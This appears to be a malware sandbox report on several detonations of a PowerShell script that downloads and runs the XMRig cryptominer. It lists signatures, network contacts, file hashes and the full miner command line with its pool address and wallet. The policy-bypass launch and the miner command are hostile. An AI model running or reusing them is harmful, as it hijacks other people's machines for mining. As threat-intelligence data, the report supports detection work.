"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4jtm4i3.hjw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:30

Platform

win11-20240426-en

Max time kernel

1790s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gw1y31oc.3c0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:43

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1778s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 198.111.78.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0mtmfp3o.w5j.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:47

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxlm1qs2.j1g.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:50

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1783s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zqd2i35f.cnt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:51

Platform

win11-20240508-en

Max time kernel

1797s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyzruhjg.anu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:20

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1759s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3kgppxs.gj5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:21

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1749s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

memory/1460-0-0x00007FFFB76B3000-0x00007FFFB76B5000-memory.dmp

memory/1460-10-0x000002AE71BB0000-0x000002AE71BD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pkrgxjah.lm2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:23

Platform

win10-20240404-en

Max time kernel

1800s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgp4pfbb.ryn.ps1

